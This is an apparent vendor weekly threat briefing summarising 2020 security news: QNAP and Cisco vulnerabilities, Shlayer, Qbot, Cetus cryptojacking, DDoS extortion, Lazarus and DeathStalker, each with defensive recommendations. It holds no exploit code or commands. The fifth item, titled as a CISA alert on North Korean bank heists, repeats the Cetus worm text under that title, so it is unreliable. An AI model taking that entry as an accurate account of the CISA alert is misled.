Weekly Threat Briefing: Malware, Lazarus Group, Vulnerabilities and More

<div id="weekly"> <p id="intro">The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics:<b> APT, Cryptojacking, DDoS, North Korea, Shlayer, Trojan, </b> and <b> Vulnerabilities</b>. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. <img src="https://cdn.filestackcontent.com/iE2TgATbSAjPPrSWCo9w"/><br/> <b>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b></p> <div id="trending-threats"> <h2 id="trendingthreats">Trending Cyber News and Threat Intelligence</h2> <h3 id="article-1" style="margin-bottom:0;"><a href="https://blog.netlab.360.com/in-the-wild-qnap-nas-attacks-en/" target="_blank"><b>In The Wild QNAP NAS Attacks</b></a></h3> <p>(published: August 31, 2020)</p> <p>Netlab 360 have identified a new QNAP NAS vulnerability allowing unauthorized remote command execution if exploited. Using an executable that doesn’t sanitize input, a threat actor could inject commands in the input. QNAP claim to have fixed the vulnerability, however, attacks still exist on the network. The purpose of the attack is currently unknown, with no bots currently being implanted.<br/> <b>Recommendation:</b> Users should immediately check and update their firmware. Last month, QNAP users were strongly encouraged to update their software due to an ongoing eChoraix ransomware.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947217">[MITRE ATT&amp;CK] Exploitation of Remote Services - T1210</a><br/> <b>Tags:</b> Remote command execution, QNAP, Vulnerability</p> <h3 id="article-2" style="margin-bottom:0;"><a href="https://www.bleepingcomputer.com/news/security/malware-authors-trick-apple-into-trusting-malicious-shlayer-apps/" target="_blank"><b>Malware Authors Trick Apple into Trusting Malicious Shlayer Apps </b></a></h3> <p>(published: August 31, 2020)</p> <p>Authors of malware “Shlayer” have been able to bypass Apple’s notarization process. Apple requires all Mac software available outside of the App Store to be scanned through the system to identify malicious software. The threat actors behind Shlayer malware have bypassed these checks, with malicious software being hosted on Homebrew and executed on victim’s computers. In addition, the authors of the malware are also dropping a persistent Bundlore variant. While Apple has revoked the certificates, more samples have appeared in recent days.<br/> <b>Recommendation:</b> According to a Kaspersky report, Shlayer malware has attacked over 10% of Mac computers. Always run antivirus and endpoint protection software to assist in preventing malware infection.<br/> <b>Tags:</b> Apple, App Store, Malware, Mac, Mac Malware, Shlayer</p> <h3 id="article-3" style="margin-bottom:0;"><a href="https://www.bleepingcomputer.com/news/security/cisco-warns-of-actively-exploited-bug-in-carrier-grade-routers/" target="_blank"><b>Cisco Warns of Actively Exploited Bug in Carrier-Grade Routers</b></a></h3> <p>(published: August 31, 2020)</p> <p>A vulnerability, registered as “CVE-2020-3566,” located in Cisco’s IOS XR software was identified by the company’s incident response team attempted to be exploited on August 28, 2020. CVE-2020-3566 affects the Distance Vector Multicast Routing Protocol (DVMRP) that, if exploited, could allow a remote threat actor to conduct a Denial of Service (DoS) attack.<br/> <b>Recommendation:</b> At the time of this writing there is no patch to fix this vulnerability, however, admins can implement some workarounds while a fix is being created. Steps include: limiting IGMP traffic rates to increase the time it would take for successful exploitation, creating a new ACL to block inbound DVMRP traffic to any interface that allows multicast routing.<br/> <b>Tags:</b> Vulnerability, DoS, CVE-2020-3566, Cisco</p> <h3 id="article-4" style="margin-bottom:0;"><a href="https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/" target="_blank"><b>Qbot Trojan Targets Outlook Threads</b></a></h3> <p>(published: August 28, 2020)</p> <p>The actor(s) behind the Qbot banking trojan have deployed a new version of the malware that uses hijacked Outlook email threads to create personalized phishing emails. Researchers from Check Point released a report detailing an ongoing Qbot campaign that has been active since March 2020 and has targeted over 10,000 victims worldwide including the US, Italy, Israel, and India. The attacks begin with phishing emails being sent to the victim’s Outlook inbox, these emails contain a zip file or URL and once that is executed, Qbot is downloaded. The malware will then activate its new feature dubbed “email collector module,” which extracts all email threads from the victim’s Outlook inbox to be used in future phishing campaigns. Qbot will then have the ability to steal device information, conduct banking transactions, and act as a dropper for other malware.<br/> <b>Recommendation:</b> Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity. Furthermore, ensure that your employees are educated about the risks of opening attachments, particularly from unknown senders and any attachment that requests macros to be enabled.<br/> <b>Tags:</b> qbot, trojan, outlook, phishing, spearphishing</p> <h3 id="article-5" style="margin-bottom:0;"><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-239a" target="_blank"><b>CISA Warn of Increase in North Korean Bank Heists</b></a></h3> <p>(published: August 28, 2020)</p> <p>Researchers from Unit 42 discovered a new cryptomining worm named “Cetus'' that infects unsecured Docker daemons with XMRig cryptominer payload. Cetus disguises itself as a legitimate binary that is frequently used in Docker environments called Portainer. While taking over a new machine, Cetus copies itself to the victim docker daemon and deploys an XMRig cryptominer payload. Cetus uses Masscan to randomly scan subnets for Docker daemons and once it finds one, it tries to spread by sending requests to daemon’s REST API. Cetus is a simple worm that doesn’t use any anti-debugging or obfuscation techniques to evade security products.<br/> <b>Recommendation:</b> Never expose a docker daemon to the internet without a proper authentication mechanism. Note that by default the Docker Engine (CE) is NOT exposed to the internet. Organizations are advised to use firewall rules to allow the incoming traffic to a small set of sources. It is not recommended to pull Docker images from unknown registries or unknown user namespaces.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947267">[MITRE ATT&amp;CK] Drive-by Compromise - T1189</a> | <a href="https://ui.threatstream.com/ttp/947138">[MITRE ATT&amp;CK] Exploit Public-Facing Application - T1190</a> | <a href="https://ui.threatstream.com/ttp/947094">[MITRE ATT&amp;CK] External Remote Services - T1133</a> | <a href="https://ui.threatstream.com/ttp/947191">[MITRE ATT&amp;CK] Command-Line Interface - T1059</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a><br/> <b>Tags:</b> CSISA, beagleboyz, APT, lazarus, ta505</p> <h3 id="article-6" style="margin-bottom:0;"><a href="https://www.zdnet.com/article/ddos-extortionists-target-nzx-moneygram-braintree-and-other-financial-services/#ftag=RSSbaffb68" target="_blank"><b>DDoS Extortionists Target Nzx, Moneygram, Braintree, And Other Financial Services</b></a></h3> <p>(published: August 27, 2020)</p> <p>A cybercriminal group is currently launching DDoS attacks against some of the world's biggest financial service providers and demanding bitcoin payments as extortion fees to stop their attacks. The criminals are using well-known threat actor names such as Fancy Bear and Armada Collective and sending ransom letters to their targets. The group currently targets multiple sectors, including banking and finance, as well as retail. Some of the recent victims of the criminal group are the New Zealand stock exchange (NZX) MoneyGram, YesBank India, PayPal, Braintree, and Venmo. According to Akamai, some of the recent DDoS attacks peaked at almost 200 Gb/sec utilizing various attack vectors.<br/> <b>Recommendation:</b> It is highly recommended to not give in to these types of extortion attempts, and instead of paying the attackers, companies should reach out and contract their services instead. Organizations should develop a DDoS prevention plan based on a thorough security assessment.<br/> <b>Tags:</b> DDoS, extortions</p> <h3 id="article-7" style="margin-bottom:0;"><a href="https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/" target="_blank"><b>Cetus: Cryptojacking Worm Targeting Docker Daemons</b></a></h3> <p>(published: August 27, 2020)</p> <p>Researchers from Unit 42 discovered a new cryptomining worm named “Cetus'' that infects unsecured Docker daemons with XMRig cryptominer payload. Cetus disguises itself as a legitimate binary that is frequently used in Docker environments called Portainer. While taking over a new machine, Cetus copies itself to the victim docker daemon and deploys an XMRig cryptominer payload. Cetus uses Masscan to randomly scan subnets for Docker daemons and once it finds one, it tries to spread by sending requests to daemon’s REST API. Cetus is a simple worm that doesn’t use any anti-debugging or obfuscation techniques to evade security products.<br/> <b>Recommendation:</b> Never expose a docker daemon to the internet without a proper authentication mechanism. Note that by default the Docker Engine (CE) is NOT exposed to the internet. Organizations are advised to use firewall rules to allow the incoming traffic to a small set of sources. It is not recommended to pull Docker images from unknown registries or unknown user namespaces.<br/> <b>Tags:</b> Cetus, cryptomining, docker</p> <h3 id="article-8" style="margin-bottom:0;"><a href="https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical/" target="_blank"><b>Lazarus Group: Campaign Targeting the Cryptocurrency Vertical</b></a></h3> <p>(published: August 25, 2020)</p> <p>F-Secure Labs has released a tactical report on a campaign targeting cryptocurrency companies by the Lazarus threat actor group. According to F-Secure, Lazarus targeted system administrators at the companies with phishing documents of job applications on LinkedIn. The document included a macro, that ones executed would create a link file that uses “mshta.exe” to download the next stage from a “bit.ly” URL. The backdoors used in the campaign are very similar to tools the group has previously used.<br/> <b>Recommendation:</b> Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947231">[MITRE ATT&amp;CK] Valid Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/947145">[MITRE ATT&amp;CK] Signed Binary Proxy Execution - T1218</a> | <a href="https://ui.threatstream.com/ttp/947191">[MITRE ATT&amp;CK] Command-Line Interface - T1059</a> | <a href="https://ui.threatstream.com/ttp/947127">[MITRE ATT&amp;CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/947194">[MITRE ATT&amp;CK] Indicator Removal on Host - T1070</a> | <a href="https://ui.threatstream.com/ttp/947142">[MITRE ATT&amp;CK] Process Injection - T1055</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947166">[MITRE ATT&amp;CK] Modify Registry - T1112</a> | <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/947162">[MITRE ATT&amp;CK] Remote Services - T1021</a> | <a href="https://ui.threatstream.com/ttp/947195">[MITRE ATT&amp;CK] File and Directory Discovery - T1083</a> | <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&amp;CK] Standard Application Layer Protocol - T1071</a><br/> <b>Tags:</b> APT, Lazarus, Cryptocurrency, Phishing, LinkedIn</p> <h3 id="article-9" style="margin-bottom:0;"><a href="https://securelist.com/deathstalker-mercenary-triumvirate/98177" target="_blank"><b>Lifting the Veil on DeathStalker, a Mercenary Triumvirate</b></a></h3> <p>(published: August 24, 2020)</p> <p>Researchers at Kaspersky Labs have released a report on a new threat actor that they have named “DeathStalker”. The group is mainly targeting companies in the financial sector and law firms. The targeting of financial sector companies does not appear to be motivated by financial gain, instead, DeathStalker acts more as a hacker-for-hire group that is focused on acquiring sensitive business information from the victims.<br/> <b>Recommendation:</b> Defense-in-depth is the best way to ensure safety from APTs. Defense-in-Depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/947191">[MITRE ATT&amp;CK] Command-Line Interface - T1059</a><br/> <b>Tags:</b> APT, DeathStalker, hacker-for-hire</p> </div> </div>